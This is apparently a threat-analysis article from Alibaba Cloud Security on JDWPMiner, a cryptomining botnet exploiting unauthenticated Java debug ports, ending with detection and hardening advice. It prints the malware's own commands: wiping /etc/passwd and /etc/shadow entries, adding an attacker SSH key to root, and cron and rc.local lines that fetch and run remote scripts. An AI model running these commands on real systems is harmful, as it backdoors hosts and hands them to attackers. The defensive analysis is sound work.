Analysis of JDWPMiner Mining Trojan: Remote Debugging with Java Causes Hidden Risks


Recently, the Alibaba Cloud Security Team detected a malicious mining attack by exploiting the RCE vulnerability of JDWP. JDWP is widely used in the development and debugging of Java applications, while Java is widely used in the development of e-commerce, office applications, CMS, and other platforms that are closely related to daily life. If remote debugging is not closed during the software release, major hidden risks will be left behind. JDWPMiner uses this feature for profitable intrusion.

Alibaba Cloud security experts have found that the botnet exploits the Java Debug RCE by downloading mining binary files from malicious download source files to achieve mining. Then, it persists through Crontab, writes the secret key to authorized_keys to get remote access, and runs four methods to rebound the shell to take full control of the host. Thus, user assets will achieve great harm.

Alibaba Cloud Security continuously monitors the BOT, finding that its spread has increased recently. Users are advised to pay attention to BOT defense.

Means of Spread

Phase Analysis

Protocol Analysis

JDWP is a TCP-based binary packet network protocol, which communicates through command packets and reply packets. The Flags field indicates whether the packet is a command packet or a response packet, and the Command Set defines the command category.

To enable the protocol above, users usually need to modify or in the bin directory of the apache-tomcat installation package. There are two connection methods; dt_shment indicates local debugging and dt_socket indicates remote debugging.

It can also be enabled through the command line:

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

The JDWP protocol does not carry authentication information. Therefore, for a Java application with a debugging port enabled, anyone can debug the application with JDWP. This brings great risks to development and O&M. JDWPMiner uses this feature for profitable intrusion.

Intrusion Analysis

java -server -Xms256m -Xmx2048m -XX:MaxPermSize=256m -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

Execute the following command:


There are four ways to bounce the shell when running the script, python, perl, nc, and bash. The C2 of script located at Luxembourg’s After the shell is executed, its host will be completely occupied by JDWPMiner.

Then, the call to will be executed in a different way.

wget -O-

Wipe out common records of /etc/passwd with sed:

sed -i 's/^eth0:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth0:.*//' /etc/shadow 2>/dev/null;sed -i 's/^eth1:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth1:.*//' /etc/shadow 2>/dev/null;sed -i 's/^sudev:.*//' /etc/passwd 2>/dev/null;sed -i 's/^sudev:.*//' /etc/shadow 2>/dev/null;sed -i 's/^system:.*//' /etc/passwd 2>/dev/null;sed -i 's/^system:.*//' /etc/shadow 2>/dev/null;

Add the public key to the /root/.ssh/authorized_keys:

# add ssh keygrep Glock /root/.ssh/authorized_keys || echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock' >> /root/.ssh/authorized_keys;chmod 755 /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;chown root:root /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;

Persist with Crontab:

# Add To Crontabgrep m247 /var/spool/cron/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/rootgrep m247 /var/spool/cron/crontabs/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/crontabs/rootgrep m247 /etc/crontab || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/crontabgrep m247 /etc/cron.d/0hourly || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/cron.d/0hourly

Persist with cron.d:

# Add to Cron.decho -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;chattr +i /etc/cron.hourly/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;chattr +i /etc/cron.daily/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;chattr +i /etc/cron.weekly/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;chattr +i /etc/cron.monthly/0;

Persist with rc.local by determining different system versions:

if [[ -e /etc/debian_version ]]; thenRCLOCAL='/etc/rc.local';echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; thenRCLOCAL='/etc/rc.d/rc.local'echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;chmod +x $RCLOCAL;elseecho -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;fi

Download mining Trojans with curl and wget:

curl -s || wget --quiet -O /dev/null

Security Recommendations

Verification Methods

  • Local Authentication: Execute the following command. If the result is returned, it means the Debug port is enabled.
ps -ef | grep jdwp | grep -v 'grep'
  • Remote Authentication: After telnetting the port, enter the command JDWP-Handshake. If the JDWP-Handshake is returned, it means the vulnerability exists.
{ echo "JDWP-Handshake"; sleep 20 } | telnet remote_host remote_port


  1. Search for or, and comment out the line with transport=dt_socket.
  2. If running Docker, modify ENV JPDA_ENABLE=1 to 0 in the dockerfile.

Detailed Security Recommendations

2. Disable the Java Debug mode

3. Cloud Firewall monitors the latest emergence of RCE on the Internet in real-time using big data. The overall time from RCE disclosure to response is less than three hours, effectively stopping customer assets from being attacked by RCE vulnerabilities. It supports three to seven layers of protocols to meet the protection of HTTP protocols for websites and the four-layer defense of a large number of TCP/UDP protocols. By default, the current version of Cloud Firewall supports defense against the remote command execution vulnerability of the Java debugging interface.

4. The Cloud Firewall intelligent policies can be customized based on historical traffic to provide the best practices for exposed face convergence in line with the customer’s business. Moreover, users can achieve maximum Internet exposure convergence of assets through one-click delivery or self-selection. By doing this, the risks of inappropriate exposure of JDWP ports to the outside world can be avoided, preventing the scanning behavior of cyberspace mapping in reinsurance mode.


SSH Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock




Alibaba Tech

First hand and in-depth information about Alibaba’s latest technology → Facebook: “Alibaba Tech”. Twitter: “AlibabaTech”.